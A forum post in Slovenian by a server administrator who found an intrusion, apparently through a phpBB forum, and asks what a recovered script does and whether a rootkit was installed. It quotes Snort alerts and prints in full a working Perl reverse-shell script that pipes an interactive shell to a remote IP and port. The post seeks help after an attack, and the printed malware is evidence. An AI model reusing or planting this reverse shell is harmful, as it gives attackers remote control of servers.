Vlom v server, kaj dela ta skripta?

Ugotovil sem, da so mi ulomili v server, verjetno prek phpbb foruma.
Load se mi je zelo povečal, zato sem pregledal procese in našel tega: perl temp2006 12.24.28.5 3303
kot je razvidno s snort poročila so z wget funkcijo na server skopirali svojo skripto in jo pognali:

Apr 26 20:54:47 **** snort[2312]: [1:1330:6] WEB-ATTACKS wget command attempt [Classification: Web Application Attack] [Priority: 1]: {TCP} 209.125.47.2:39588 -> ***.***.***.***:80
Apr 26 20:54:47 **** snort[2312]: [1:1356:5] WEB-ATTACKS perl execution attempt [Classification: Web Application Attack] [Priority: 1]: {TCP} 209.125.47.2:39588 -> ***.***.***.***:80

Zanima me kaj izvaja vsebina te skripte ki sem jo našel na serverju, Nod jo prepozna kot Linux/Mare.E, vsebina pa je:

#!/usr/bin/perl
use Socket;
use FileHandle;
$IP = $ARGV[0];
$PORT = $ARGV[1];
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
connect(SOCKET, sockaddr_in($PORT,inet_aton($IP)));
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
system("id;pwd;uname -a;w;HISTFILE=/dev/null /bin/sh -i")


Zanima me torej kaj ta skripta naredi? Backdoor? DDos?
Kja naj sedaj naredim s serverjem? Kot sem gledal ni nobene spremembe...

Tam kamor se je pa poskusla zadeva povezat, je pa verjetno avtomatski server, ki poslje rootkit.

Server sem pregledal z rkhunter in chkrootkit, pa ni noben nešel nič sumljivega...
A je za nalaganje rotkita treba dešifrirat kakšno geslo?
Čudno mi je namreč, da je bil load zelo visko ko je bila skripta zagnana...

A je možno da mi niso naložili rootkita?
Res se mi ne da še 1x vse nalagati.. Čeprav verjetno mi res ne uide..